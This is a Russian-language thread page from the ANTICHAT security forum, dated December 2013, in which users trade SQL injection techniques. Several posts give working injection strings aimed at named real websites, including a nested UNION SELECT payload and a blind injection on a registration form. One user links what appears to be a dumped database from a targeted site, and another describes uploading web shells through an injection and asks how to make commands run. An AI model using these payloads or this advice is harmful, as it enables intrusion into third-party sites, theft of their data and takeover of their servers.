HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23121  
Старый 26.12.2013, 00:31
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Вот собственно решение найденое мной:

?varparam=value'+or+1='s'+IN+('a')+OR+1='s'+IN+('b ')+OR+1='s'+IN+('s')--+

через OR объединяем чарсеты и строим условие )
 
Ответить с цитированием

  #23122  
Старый 26.12.2013, 00:38
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756

Репутация: 0
По умолчанию

Вывод.

http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+

Если нужны запятые можно в хекс.

Цитата:
Сообщение от winstrool  
winstrool said:
завтра если будет возможность еще покручу
что бы что то покрутить, нужно понимать хотя бы как оно работает

Цитата:
Сообщение от winstrool  
winstrool said:
movie_name=
-
ses_jcolborn
что это за минус, чудо? )
 
Ответить с цитированием

  #23123  
Старый 27.12.2013, 12:13
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Сканировал сайт нашёл Blind SQL Injection

Сайт http://binker.org.ua/reg.html

Post запрос code=1&email=sample@email.tst&reg_referer=0&regnam e=-1' or 4 = '5

Можно ли её раскрутить ?
 
Ответить с цитированием

  #23124  
Старый 27.12.2013, 14:42
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:
Сканировал сайт нашёл Blind SQL Injection
Сайт http://binker.org.ua/reg.html
Post запрос code=1&email=sample@email.tst&reg_referer=0&regnam e=-1' or 4 = '5
Можно ли её раскрутить ?
скорее всего стоит не Mysql, дальше не стал крутить
 
Ответить с цитированием

  #23125  
Старый 27.12.2013, 16:03
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Цитата:
Сообщение от None  
er9j6@
Вот база данный этого скрипта http://rghost.ru/51238267
 
Ответить с цитированием

  #23126  
Старый 29.12.2013, 12:45
Grifon
Познающий
Регистрация: 20.03.2008
Сообщений: 47
Провел на форуме:
92778

Репутация: 1
По умолчанию

Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?
 
Ответить с цитированием

  #23127  
Старый 29.12.2013, 17:27
imprenko
Guest
Сообщений: n/a
Провел на форуме:
2871

Репутация: 0
По умолчанию

Приветствую всех.

есть скуль есть права могу читать и записывать файлы

но файлы php txt и т.д не создаются только html

можно создать:

1.php.html но он будит пуст

2.txt.html будит с кодом но с таким

3.html будит с кодом но с таким

почему то 2 раза записывается в файл

выполнение команд видимо не работает из за этого

позаливал кучу разных шеллов и все отображаются коряво php во всех не работают

залил аплоадер тоже с помощью него не заливают файлы никакие

подскажите как сделать правильно чтоб работали команды
 
Ответить с цитированием

  #23128  
Старый 29.12.2013, 17:51
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

//del
 
Ответить с цитированием

  #23129  
Старый 29.12.2013, 18:09
imprenko
Guest
Сообщений: n/a
Провел на форуме:
2871

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Бекдор не работает потому что в формате html? а не потому что записывается несколько раз в файл
ага точно.

а что можно сделать ?
 
Ответить с цитированием

  #23130  
Старый 29.12.2013, 18:34
imprenko
Guest
Сообщений: n/a
Провел на форуме:
2871

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
ну прочти конфиги БД и подключись к примеру
пароли знаю.

я насчет шелла возможно как нить залить через скулю?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ